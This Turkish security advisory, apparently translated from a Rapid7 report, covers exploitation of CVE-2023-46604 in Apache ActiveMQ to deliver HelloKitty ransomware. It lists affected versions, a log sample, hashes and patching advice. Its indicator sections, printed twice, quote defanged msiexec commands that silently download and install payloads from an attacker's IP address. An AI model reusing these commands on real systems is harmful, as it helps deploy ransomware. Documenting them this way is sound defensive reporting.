CVE-2023-46604, Apache ActiveMQ'de uzaktan kod yürütme açığıdır ve bir uzaktan saldırganın ağa erişimi olan bir broker "OpenWire protokolündeki seri hale getirilmiş sınıf türlerini manipüle ederek broker'ı sınıf yolu üzerindeki herhangi bir sınıfı örneklemek için tetiklemesine izin verir." Bu, gördüğümüz daha karmaşık açıklıklardan biri, ancak sorunun temel nedeni güvensiz serileştirme işlemidir.
Apache, güvenlik açığını açıkladı ve 25 Ekim 2023'te ActiveMQ'nun yeni sürümlerini yayınladı. Kanıt niteliğindeki saldırı kodu ve güvenlik açığı ayrıntıları her ikisi de kamuya açıktır. Rapid7'nin güvenlik açığı araştırma ekibi, kamuya açık PoC'yi test etti ve MDR'ın müşteri ortamlarında gözlemlediği davranışın CVE-2023-46604'ün istismarıyla beklendiği gibi benzer olduğunu doğruladı. Rapid7 araştırması, AttackerKB'de güvenlik açığının teknik analizine sahiptir.
Etkilenen Ürünler
Apache'nin bildirisine göre, CVE-2023-46604 aşağıdakileri etkiler:
Apache ActiveMQ 5.18.0'dan önceki sürümler, 5.18.3'ten önce
Apache ActiveMQ 5.17.0'den önceki sürümler, 5.17.6'dan önce
Apache ActiveMQ 5.16.0'dan önceki sürümler, 5.16.7'den önce
Apache ActiveMQ 5.15.16'dan önceki sürümler
Apache ActiveMQ Legacy OpenWire Modülü 5.18.0'dan önceki sürümler, 5.18.3'ten önce
Apache ActiveMQ Legacy OpenWire Modülü 5.17.0'den önceki sürümler, 5.17.6'dan önce
Apache ActiveMQ Legacy OpenWire Modülü 5.16.0'dan önceki sürümler, 5.16.7'den önce
Apache ActiveMQ Legacy OpenWire Modülü 5.15.16'dan önceki sürümler
Saldırısı Nasıl ?
Zafiyetin başarılı bir şekilde istismarı sırasında, Java.exe hedeflenen belirli Apache uygulamasını içerecektir - bu durumda, her iki olayda da ebeveyn işlem olarak gözlemlenen D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64. Saldırganın saldırı sonrasında, MSIExec kullanarak M2.png ve M4.png adlı uzak ikili dosyaları yüklemeye çalıştığı gözlendi. Tehdit aktörünün fidye yazılımı dağıtma girişimleri biraz sakarca oldu: Rapid7'nin gözlemlediği olaylardan birinde, varlıkları şifrelemek için yarım düzine başarısız girişimden fazlası vardı.
HelloKitty Fidye Yazılımı Detaylar
Rapid7, MSI dosyaları M4.png ve M2.png'yi 172.245.16[.]125 alan adından edindi ve kontrol edilen bir ortamda analiz etti. Analizden sonra, Rapid7, her iki MSI dosyasının da içeriden dllloader adında bir 32-bit .NET yürütülebilir dosya içerdiğini gözlemledi. .NET yürütülebilir dllloader içinde, Rapid7, yürütülebilir dosyanın Base64 ile kodlanmış bir yük içe aktardığını buldu. Base64 ile kodlanmış yükü çözümledik ve bunun 32-bit .NET DLL olan EncDLL olduğunu belirledik.
EncDLL ikili dosyası, fidye yazılımına benzer işlevsellik içeriyordu - DLL, belirli işlemleri arar ve onları çalışmaktan durdurur. Rapid7, DLL'nin belirli dosya uzantılarını RSACryptoServiceProvider işlevini kullanarak şifrelediğini ve şifrelenmiş dosyaları .locked uzantısıyla eklediğini gözlemledi. Ayrıca, hangi dizinlerin şifrelenmemesi gerektiği hakkında bilgi sağlayan bir başka işlev, fidye notu ile atanan bir sabit değişken ve bir HTTP sunucusuna iletişim kurmaya çalışan bir işlev de gözlemledik, 172.245.16[.]125.
Tehdit Belirtileri
Rapid7'nin zafiyet araştırma ekibi CVE-2023-46604'ü ve mevcut kamuya açık saldırı kodunu analiz etti. Test kurulumumuzda, activemq.log dosyasında CVE-2023-46604'ün başarılı bir şekilde istismarı için tek bir satır girişi vardı:
Kod:
2023-10-31 05:04:58,736 | WARN | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616
Yukarıdaki örnekte, saldırganın (yani araştırmacının) IP adresi 192.168.86.35'ti ve hedef TCP bağlantı noktası 61616 idi. Günlükleme ayarlarına bağlı olarak daha fazla veya daha az bilgi mevcut olabilir ve bunlar değiştirilebilir.
Diğer Tehdit Belirtileri:
http://172.245.16[.]125/m2.png
http://172.245.16[.]125/m4.png
Dosyaların bırakılması ve msiexec komutuyla yürütülmesi:
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
Aşağıdaki dosya özetleri, 172.245.16[.]125 alan adından indirilen iki MSI paketinin bir parçasıydı:
M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
Önlem Alma Rehberi
Kuruluşlar, mümkün olan en kısa sürede ActiveMQ'nun düzeltilmiş bir sürümüne güncelleme yapmalı ve ortamlarında ihlal belirtilerini aramalıdır. Apache tarafından sağlanan güncellemelere buradan erişilebilir. Apache, ActiveMQ uygulamalarının güvenliğini artırma hakkında bilgiye buradan ulaşılabilir.
Kaynaklar
Diğer Tehdit Belirtileri:
http://172.245.16[.]125/m2.png
http://172.245.16[.]125/m4.png
Dosyaların bırakılması ve msiexec komutuyla yürütülmesi:
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
Aşağıdaki dosya özetleri, 172.245.16[.]125 alan adından indirilen iki MSI paketinin bir parçasıydı:
M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
Önlem Alma Rehberi
Kuruluşlar, mümkün olan en kısa sürede ActiveMQ'nun düzeltilmiş bir sürümüne güncelleme yapmalı ve ortamlarında ihlal belirtilerini aramalıdır. Apache tarafından sağlanan güncellemelere buradan erişilebilir. Apache, ActiveMQ uygulamalarının güvenliğini artırma hakkında bilgiye buradan ulaşılabilir.
ActiveMQ
activemq.apache.org
ActiveMQ
activemq.apache.org
Kaynaklar
GitHub - X1r0z/ActiveMQ-RCE: ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具
ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具. Contribute to X1r0z/ActiveMQ-RCE development by creating an account on GitHub.
github.com
HelloKitty ransomware source code leaked on hacking forum
A threat actor has leaked the complete source code for the first version of the HelloKitty ransomware on a Russian-speaking hacking forum, claiming to be developing a new, more powerful encryptor.
www.bleepingcomputer.com
NVD - CVE-2023-46604
nvd.nist.gov
ActiveMQ
activemq.apache.org
CVE-2023-46604 | AttackerKB
Update Nov 2, 2023: Added reference to Rapid7 ETR blog in the timeline. ## Overview Apache ActiveMQ is a message broker service, designed to act as a communica…
attackerkb.com